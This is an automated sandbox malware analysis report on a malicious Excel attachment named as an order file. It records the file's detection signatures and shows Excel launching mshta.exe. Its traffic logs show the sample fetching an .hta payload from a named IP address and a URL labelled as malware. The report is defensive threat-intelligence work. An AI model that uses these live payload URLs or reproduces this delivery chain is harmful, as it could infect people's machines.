Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Order_948575494759.xls

Overview

General Information

Sample name:Order_948575494759.xls
Analysis ID:1577527
MD5:6bcc53dc843155e886f469778b4216f1
SHA1:ca277194f41d84c108389a788d7281e7566ed9f0
SHA256:379fe2ae5a34b2349fe492b4318c589416c5cc8f1e54eb1502455863da17395e
Tags:xlsuser-abuse_ch
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Machine Learning detection for sample
Microsoft Office drops suspicious files
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • EXCEL.EXE (PID: 5044 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • mshta.exe (PID: 2992 cmdline: C:\Windows\SysWOW64\mshta.exe -Embedding MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • splwow64.exe (PID: 4148 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • EXCEL.EXE (PID: 1088 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Order_948575494759.xls" MD5: 4A871771235598812032C822E6F68F19)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ProcessId: 5044, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns[1].hta
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 5044, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, ProcessId: 2992, ProcessName: mshta.exe
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 170.82.173.30, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 5044, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49840
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.5, DestinationIsIpv6: false, DestinationPort: 49840, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 5044, Protocol: tcp, SourceIp: 170.82.173.30, SourceIsIpv6: false, SourcePort: 443
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://curt.wiz.co/f0O8JN5298?&letter=muddy&gobbler=tiresome&nexusAvira URL Cloud: Label: malware
Source: https://curt.wiz.co/f0O8JN5298?&letter=muddy&gobbler=tiresome&nexus(YAvira URL Cloud: Label: malware
Source: Order_948575494759.xlsReversingLabs: Detection: 18%
Source: Order_948575494759.xlsJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 170.82.173.30:443 -> 192.168.2.5:49840 version: TLS 1.2

Software Vulnerabilities

barindex
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe
Source: global trafficDNS query: name: curt.wiz.co
Source: global trafficDNS query: name: curt.wiz.co
Source: global trafficTCP traffic: 192.168.2.5:49840 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.5:49851 -> 173.214.167.74:80
Source: global trafficTCP traffic: 192.168.2.5:49840 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.5:49840 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.5:49840 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.5:49840 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.5:49840 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.5:49840 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.5:49840 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.5:49840 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.5:49840 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.5:49840 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.5:49840 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.5:49840 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.5:49840 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.5:49840 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.5:49840 -> 170.82.173.30:443
Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.5:49840
Source: global trafficTCP traffic: 192.168.2.5:49840 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.5:49840 -> 170.82.173.30:443
Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.5:49840
Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.5:49840
Source: global trafficTCP traffic: 192.168.2.5:49840 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.5:49840 -> 170.82.173.30:443
Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.5:49840
Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.5:49840
Source: global trafficTCP traffic: 192.168.2.5:49840 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.5:49840 -> 170.82.173.30:443
Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.5:49840
Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.5:49840
Source: global trafficTCP traffic: 192.168.2.5:49840 -> 170.82.173.30:443
Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.5:49840
Source: global trafficTCP traffic: 192.168.2.5:49840 -> 170.82.173.30:443
Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.5:49840
Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.5:49840
Source: global trafficTCP traffic: 192.168.2.5:49840 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.5:49840 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.5:49840 -> 170.82.173.30:443
Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.5:49840
Source: global trafficTCP traffic: 192.168.2.5:49840 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.5:49840 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.5:49851 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.5:49851
Source: global trafficTCP traffic: 192.168.2.5:49851 -> 173.214.167.74:80
Source: global trafficTCP traffic: 192.168.2.5:49851 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.5:49851
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.5:49851
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.5:49851
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.5:49851
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.5:49851
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.5:49851
Source: global trafficTCP traffic: 192.168.2.5:49851 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.5:49851
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.5:49851
Source: global trafficTCP traffic: 192.168.2.5:49851 -> 173.214.167.74:80
Source: global trafficTCP traffic: 192.168.2.5:49851 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.5:49851
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.5:49851
Source: global trafficTCP traffic: 192.168.2.5:49851 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.5:49851
Source: global trafficTCP traffic: 192.168.2.5:49851 -> 173.214.167.74:80
Source: global trafficTCP traffic: 192.168.2.5:49851 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.5:49851
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.5:49851
Source: global trafficTCP traffic: 192.168.2.5:49851 -> 173.214.167.74:80
Source: global trafficTCP traffic: 192.168.2.5:49851 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.5:49851
Source: global trafficTCP traffic: 192.168.2.5:49851 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.5:49851
Source: global trafficTCP traffic: 192.168.2.5:49851 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.5:49851
Source: global trafficTCP traffic: 192.168.2.5:49851 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.5:49851
Source: global trafficTCP traffic: 192.168.2.5:49851 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.5:49851
Source: global trafficTCP traffic: 192.168.2.5:49851 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.5:49851
Source: global trafficTCP traffic: 192.168.2.5:49851 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.5:49851
Source: global trafficTCP traffic: 192.168.2.5:49851 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.5:49851
Source: global trafficTCP traffic: 192.168.2.5:49851 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.5:49851
Source: global trafficTCP traffic: 192.168.2.5:49851 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.5:49851
Source: global trafficTCP traffic: 192.168.2.5:49851 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.5:49851
Source: global trafficTCP traffic: 192.168.2.5:49851 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.5:49851
Source: global trafficTCP traffic: 192.168.2.5:49851 -> 173.214.167.74:80
Source: global trafficTCP traffic: 192.168.2.5:49851 -> 173.214.167.74:80
Source: global trafficTCP traffic: 192.168.2.5:49851 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.5:49851
Source: global trafficTCP traffic: 192.168.2.5:49851 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.5:49851
Source: global trafficTCP traffic: 192.168.2.5:49851 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.5:49851
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.5:49851
Source: global trafficTCP traffic: 192.168.2.5:49851 -> 173.214.167.74:80
Source: global trafficTCP traffic: 192.168.2.5:49851 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.5:49851
Source: global trafficTCP traffic: 192.168.2.5:49851 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.5:49851
Source: global trafficTCP traffic: 192.168.2.5:49851 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.5:49851
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.5:49851
Source: global trafficTCP traffic: 192.168.2.5:49851 -> 173.214.167.74:80
Source: global trafficTCP traffic: 192.168.2.5:49851 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.5:49851
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.5:49851
Source: global trafficTCP traffic: 192.168.2.5:49851 -> 173.214.167.74:80
Source: global trafficTCP traffic: 192.168.2.5:49851 -> 173.214.167.74:80
Source: excel.exeMemory has grown: Private usage: 2MB later: 96MB
Source: Joe Sandbox ViewIP Address: 170.82.173.30 170.82.173.30
Source: Joe Sandbox ViewIP Address: 170.82.173.30 170.82.173.30
Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: global trafficHTTP traffic detected: GET /f0O8JN5298?&letter=muddy&gobbler=tiresome&nexus HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: curt.wiz.coConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /xampp/dcv/greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /f0O8JN5298?&letter=muddy&gobbler=tiresome&nexus HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: curt.wiz.coConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /xampp/dcv/greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 173.214.167.74
Source: global trafficDNS traffic detected: DNS query: curt.wiz.co
Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD41570.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
Source: Order_948575494759.xls, E1A40000.0.drString found in binary or memory: https://curt.wiz.co/f0O8JN5298?&letter=muddy&gobbler=tiresome&nexus(Y
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
Source: unknownHTTPS traffic detected: 170.82.173.30:443 -> 192.168.2.5:49840 version: TLS 1.2

System Summary

barindex
Source: Order_948575494759.xlsOLE: Microsoft Excel 2007+
Source: Order_948575494759.xlsOLE: Microsoft Excel 2007+
Source: Order_948575494759.xlsOLE: Microsoft Excel 2007+
Source: Order_948575494759.xlsOLE: Microsoft Excel 2007+
Source: Order_948575494759.xlsOLE: Microsoft Excel 2007+
Source: ~DF4E1EE0E8B3A38003.TMP.0.drOLE: Microsoft Excel 2007+
Source: ~DFDC3AF7D016FF81CB.TMP.0.drOLE: Microsoft Excel 2007+
Source: ~DF5BD8117A11F4E872.TMP.0.drOLE: Microsoft Excel 2007+
Source: E1A40000.0.drOLE: Microsoft Excel 2007+
Source: E1A40000.0.drOLE: Microsoft Excel 2007+
Source: E1A40000.0.drOLE: Microsoft Excel 2007+
Source: E1A40000.0.drOLE: Microsoft Excel 2007+
Source: E1A40000.0.drOLE: Microsoft Excel 2007+
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns[1].htaJump to behavior
Source: Order_948575494759.xlsOLE indicator, VBA macros: true
Source: E1A40000.0.drOLE indicator, VBA macros: true
Source: Order_948575494759.xlsStream path 'MBD0191BFBA/\x1Ole' : https://curt.wiz.co/f0O8JN5298?&letter=muddy&gobbler=tiresome&nexus(Y?{{&4.vTenNz)J^e\a"gwbr+|t:R?B$L;:q2>3vkXx#DD%6rxLf1HH~cO%XRlao}>cK8?y/e(fMrwkIfgZIUaBEn6PyQPnllBBJ935NZJO4LDpizQLCnZkC5OPZ8mzPWE9qwTqVIXYLqSdDQoG897OndRP2duPTd9nHdlpMo3KYOvQtwfmm2vrmB2BaFzIAVpsbX14TeMAcPrMtZ4hJMKTNBB22bF((aG\($"JjP
Source: E1A40000.0.drStream path 'MBD0191BFBA/\x1Ole' : https://curt.wiz.co/f0O8JN5298?&letter=muddy&gobbler=tiresome&nexus(Y?{{&4.vTenNz)J^e\a"gwbr+|t:R?B$L;:q2>3vkXx#DD%6rxLf1HH~cO%XRlao}>cK8?y/e(fMrwkIfgZIUaBEn6PyQPnllBBJ935NZJO4LDpizQLCnZkC5OPZ8mzPWE9qwTqVIXYLqSdDQoG897OndRP2duPTd9nHdlpMo3KYOvQtwfmm2vrmB2BaFzIAVpsbX14TeMAcPrMtZ4hJMKTNBB22bF((aG\($"JjP
Source: ~DF4E1EE0E8B3A38003.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DFDC3AF7D016FF81CB.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DF5BD8117A11F4E872.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: classification engineClassification label: mal80.expl.winXLS@6/42@2/2
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\4AC946A0.emfJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{A3C5C2CF-C3A4-4B86-B001-A589E0298EA1} - OProcSessId.datJump to behavior
Source: Order_948575494759.xlsOLE indicator, Workbook stream: true
Source: E1A40000.0.drOLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Order_948575494759.xlsReversingLabs: Detection: 18%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Order_948575494759.xls"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -EmbeddingJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: c2r32.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: Order_948575494759.xlsStatic file information: File size 1124352 > 1048576
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: ~DF4E1EE0E8B3A38003.TMP.0.drInitial sample: OLE indicators vbamacros = False
Source: Order_948575494759.xlsInitial sample: OLE indicators encrypted = True
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
